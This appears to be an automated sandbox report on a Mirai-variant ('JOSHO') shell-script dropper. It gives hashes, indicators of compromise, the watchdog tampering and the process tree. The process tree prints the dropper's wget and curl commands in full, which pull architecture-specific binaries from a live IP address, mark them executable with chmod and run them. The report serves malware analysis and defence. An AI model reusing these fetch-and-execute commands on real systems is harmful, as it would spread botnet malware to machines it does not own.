Analysis
-
max time kernel
148s -
max time network
149s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240226-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
27-04-2024 17:59
Static task
static1
General
-
Target
8UsA.sh
-
Size
1KB
-
MD5
d060b7e197e9a5ef62013de9b1246b0e
-
SHA1
954455791558cc2be3dc1b451f70a40e1de04f3a
-
SHA256
09ae6fb139fb48daf4a6fb4c6754a040367836054ed902f19211806696470cc9
-
SHA512
338d74f70ad3b05762ea3a1e127e00d1e08ffd1c4569d7745b58894bfec1304ef353a40229271f342266637fc2eed2390cb7922c7dadce5b365a8c18e83a82df
Malware Config
Extracted
mirai
JOSHO
Signatures
-
Executes dropped EXE 10 IoCs
Processes:
3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvAioc pid process /tmp/3AvA 1594 3AvA /tmp/3AvA 1602 3AvA /tmp/3AvA 1610 3AvA /tmp/3AvA 1618 3AvA /tmp/3AvA 1626 3AvA /tmp/3AvA 1634 3AvA /tmp/3AvA 1642 3AvA /tmp/3AvA 1650 3AvA /tmp/3AvA 1658 3AvA /tmp/3AvA 1666 3AvA -
Modifies Watchdog functionality 1 TTPs 20 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
Processes:
3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvAdescription ioc process File opened for modification /dev/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA -
Changes its process name 10 IoCs
Processes:
3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvAdescription pid process Changes the process name, possibly in an attempt to hide itself 1594 3AvA Changes the process name, possibly in an attempt to hide itself 1602 3AvA Changes the process name, possibly in an attempt to hide itself 1610 3AvA Changes the process name, possibly in an attempt to hide itself 1618 3AvA Changes the process name, possibly in an attempt to hide itself 1626 3AvA Changes the process name, possibly in an attempt to hide itself 1634 3AvA Changes the process name, possibly in an attempt to hide itself 1642 3AvA Changes the process name, possibly in an attempt to hide itself 1650 3AvA Changes the process name, possibly in an attempt to hide itself 1658 3AvA Changes the process name, possibly in an attempt to hide itself 1666 3AvA -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlwgetcurlwgetcurlcurl8UsA.shcurlcurlwgetwgetcurlwgetwgetcurlwgetwgetcurlcurldescription ioc process File opened for modification /tmp/Josho.mips wget File opened for modification /tmp/Josho.arm4 curl File opened for modification /tmp/Josho.arm5 wget File opened for modification /tmp/Josho.arm6 curl File opened for modification /tmp/Josho.arm7 wget File opened for modification /tmp/Josho.m68k curl File opened for modification /tmp/Josho.sh4 curl File opened for modification /tmp/3AvA 8UsA.sh File opened for modification /tmp/Josho.x86 curl File opened for modification /tmp/Josho.mips curl File opened for modification /tmp/Josho.mpsl wget File opened for modification /tmp/Josho.arm6 wget File opened for modification /tmp/Josho.arm7 curl File opened for modification /tmp/Josho.x86 wget File opened for modification /tmp/Josho.ppc wget File opened for modification /tmp/Josho.ppc curl File opened for modification /tmp/Josho.m68k wget File opened for modification /tmp/Josho.sh4 wget File opened for modification /tmp/Josho.mpsl curl File opened for modification /tmp/Josho.arm5 curl
Processes
-
/tmp/8UsA.sh/tmp/8UsA.sh1⤵
- Writes file to tmp directory
PID:1575 -
/usr/bin/wgetwget http://209.14.69.249/AB4g5/Josho.x862⤵
- Writes file to tmp directory
PID:1576
-
-
/usr/bin/curlcurl -O http://209.14.69.249/AB4g5/Josho.x862⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/catcat Josho.x862⤵PID:1592
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o2⤵PID:1593
-
-
/tmp/3AvA./3AvA ssh2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1594
-
-
/usr/bin/wgetwget http://209.14.69.249/AB4g5/Josho.mips2⤵
- Writes file to tmp directory
PID:1597
-
-
/usr/bin/curlcurl -O http://209.14.69.249/AB4g5/Josho.mips2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o2⤵PID:1601
-
-
/tmp/3AvA./3AvA ssh2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1602
-
-
/usr/bin/wgetwget http://209.14.69.249/AB4g5/Josho.mpsl2⤵
- Writes file to tmp directory
PID:1605
-
-
/usr/bin/curlcurl -O http://209.14.69.249/AB4g5/Josho.mpsl2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o2⤵PID:1609
-
-
/tmp/3AvA./3AvA ssh2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1610
-
-
/usr/bin/wgetwget http://209.14.69.249/AB4g5/Josho.arm42⤵PID:1613
-
-
/usr/bin/curlcurl -O http://209.14.69.249/AB4g5/Josho.arm42⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o2⤵PID:1617
-
-
/tmp/3AvA./3AvA ssh2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1618
-
-
/usr/bin/wgetwget http://209.14.69.249/AB4g5/Josho.arm52⤵
- Writes file to tmp directory
PID:1621
-
-
/usr/bin/curlcurl -O http://209.14.69.249/AB4g5/Josho.arm52⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o2⤵PID:1625
-
-
/tmp/3AvA./3AvA ssh2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1626
-
-
/usr/bin/wgetwget http://209.14.69.249/AB4g5/Josho.arm62⤵
- Writes file to tmp directory
PID:1629
-
-
/usr/bin/curlcurl -O http://209.14.69.249/AB4g5/Josho.arm62⤵
- Writes file to tmp directory
PID:1631
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o2⤵PID:1633
-
-
/tmp/3AvA./3AvA ssh2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1634
-
-
/usr/bin/wgetwget http://209.14.69.249/AB4g5/Josho.arm72⤵
- Writes file to tmp directory
PID:1637
-
-
/usr/bin/curlcurl -O http://209.14.69.249/AB4g5/Josho.arm72⤵
- Writes file to tmp directory
PID:1639
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o2⤵PID:1641
-
-
/tmp/3AvA./3AvA ssh2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1642
-
-
/usr/bin/wgetwget http://209.14.69.249/AB4g5/Josho.ppc2⤵
- Writes file to tmp directory
PID:1645
-
-
/usr/bin/curlcurl -O http://209.14.69.249/AB4g5/Josho.ppc2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o2⤵PID:1649
-
-
/tmp/3AvA./3AvA ssh2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1650
-
-
/usr/bin/wgetwget http://209.14.69.249/AB4g5/Josho.m68k2⤵
- Writes file to tmp directory
PID:1653
-
-
/usr/bin/curlcurl -O http://209.14.69.249/AB4g5/Josho.m68k2⤵
- Writes file to tmp directory
PID:1655
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o2⤵PID:1657
-
-
/tmp/3AvA./3AvA ssh2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1658
-
-
/usr/bin/wgetwget http://209.14.69.249/AB4g5/Josho.sh42⤵
- Writes file to tmp directory
PID:1661
-
-
/usr/bin/curlcurl -O http://209.14.69.249/AB4g5/Josho.sh42⤵
- Writes file to tmp directory
PID:1663
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.sh4 Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o2⤵PID:1665
-
-
/tmp/3AvA./3AvA ssh2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1666
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
46KB
MD5a648e3916f191a59f47d07a49702d0eb
SHA11d9280fd392858f5dbe61aea4cfa2453ade97442
SHA2560a82c84b8564ae5a178e3e8f6fc4550885055043928ee667e59efb035f9ccfc3
SHA51273ef7ce042d0d165c327acd50e984a08b3d8450fb8821c8ef390a8dc02044128836ba7590bd035a072a9b7a4c94defed1256e85b03887788fa998e5648b5e587